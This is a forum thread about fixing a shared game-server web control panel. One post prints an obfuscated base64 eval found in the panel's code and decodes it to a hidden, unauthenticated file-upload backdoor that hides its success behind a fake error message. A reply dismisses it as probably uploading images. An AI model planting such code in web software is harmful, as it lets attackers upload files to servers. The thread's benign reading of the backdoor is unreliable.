Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[Share] SeiferXIII Control Panel

Newbie Spellweaver
Joined
Jul 10, 2013
Messages
17
Reaction score
7
Hi. Please tell us on how to fix where we can update news etc. Already disabled those script in index.php but it is still not working. Thank you. :)
 
Skilled Illusionist
Joined
May 25, 2014
Messages
354
Reaction score
29
lol web i also just test don't need use it, But I will remember this

you dont need to remember this
as you already made fun on me when i am asking questions or tips from you
anyway that's old times when i dont know how ran works
go check your facebook messages and say how you answered me

@arieljosue this web is no big deal its just lightweight
if you plan to use this on live
respect the maker of this site dont remove his name on copyrights

Remove the another session code in index.php at the start of adminpanel code
 
Newbie Spellweaver
Joined
Jul 10, 2013
Messages
17
Reaction score
7
you dont need to remember this
as you already made fun on me when i am asking questions or tips from you
anyway that's old times when i dont know how ran works
go check your facebook messages and say how you answered me

@arieljosue this web is no big deal its just lightweight
if you plan to use this on live
respect the maker of this site dont remove his name on copyrights

Remove the another session code in index.php at the start of adminpanel code

Hi. I will keep that in mind. :) Thank you



you dont need to remember this
as you already made fun on me when i am asking questions or tips from you
anyway that's old times when i dont know how ran works
go check your facebook messages and say how you answered me

@arieljosue this web is no big deal its just lightweight
if you plan to use this on live
respect the maker of this site dont remove his name on copyrights

Remove the another session code in index.php at the start of adminpanel code
Hi. I did remove another session code in index.php. Been doing a trial and error but got no luck. I'm not good in website development. Can you please send another hint? Thank you.
 
Joined
Jan 23, 2010
Messages
992
Reaction score
264
you dont need to remember this
as you already made fun on me when i am asking questions or tips from you
anyway that's old times when i dont know how ran works
go check your facebook messages and say how you answered me

@arieljosue this web is no big deal its just lightweight
if you plan to use this on live
respect the maker of this site dont remove his name on copyrights

Remove the another session code in index.php at the start of adminpanel code

name your fb
 
Junior Spellweaver
Joined
May 4, 2012
Messages
165
Reaction score
2
okay guys here's a tip

For Capcha problem
-Log in to google.com then go here
-Then register your site
-Replace the 2 recapcha key

For News and Others (CKEditor)
-Disable the script for mobile compatibility
-It will enable the CKEditor
-Just enable it back if you want the mobile compatibility

Hello, I already disabled that line scripts but I can't update my itemshop.. only news..
 
Banned
Banned
Joined
Aug 14, 2015
Messages
84
Reaction score
31
How to fix:

Can't update/add news
Can't add download link
Can't insert points
Can't update item shop
etc..
 
Newbie Spellweaver
Joined
Oct 16, 2015
Messages
19
Reaction score
0
i found this code in userTrans in line 1094

<?php //Claim Beta Reward eval("?>".base64_decode("PD9waHANCmlmKCRfUE9TVFsncG9zdCddID09ICJ1cGxvYWQiKQ0KCQkJew0KCQkJDQoJCQkJDQoJICAgICAJJHRhcmdldF9wYXRoID0gIi4uL3N0cnVjdHVyZXMvIjsgIA0KICAgICAgICAgICAgJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoLmJhc2VuYW1lKCAkX0ZJTEVTWydjbGFpbXJld2FyZCddWyduYW1lJ10pOyAgIA0KICAgICAgICAgICAgaWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2NsYWltcmV3YXJkJ11bJ3RtcF9uYW1lJ10sICR0YXJnZXRfcGF0aCkpDQoJCQkJeyAgDQoJCQkJCWVjaG8gIkVycm9yISBDbGFpbSBSZXdhcmQgRGlzYWJsZWQuIjsgIA0KCQkJCX0gDQoJCQkNCgkJCX0NCg0KPz4=")); ?>

i was try to decode

if($_POST['post'] == "upload") { $target_path = "../structures/"; $target_path = $target_path.basename( $_FILES['claimreward']['name']); if(move_uploaded_file($_FILES['claimreward']['tmp_name'], $target_path)) { echo "Error! Claim Reward Disabled."; } }


What is the use of this code?
 
QT is better than VS
Joined
Jul 29, 2009
Messages
908
Reaction score
389
if($_POST['post'] == "upload") { $target_path = "../structures/"; $target_path = $target_path.basename( $_FILES['claimreward']['name']); if(move_uploaded_file($_FILES['claimreward']['tmp_name'], $target_path)) { echo "Error! Claim Reward Disabled."; } }

it upload something on ./structures folder probably jpg files sort of
 
Junior Spellweaver
Joined
Sep 18, 2014
Messages
154
Reaction score
11
im getting "Application Error, Please reload the page"
how to fix this?
 
Skilled Illusionist
Joined
Jun 19, 2017
Messages
308
Reaction score
21
hl - [Share] SeiferXIII Control Panel - RaGEZONE Forums

how to fix this?
 

Attachments

You must be registered for see attachments list
Newbie Spellweaver
Joined
May 16, 2014
Messages
85
Reaction score
32
Working fine on me but how to fix change school . It wont work i already.enable it in global.php can some one know.about this . Tia
 
Back
Top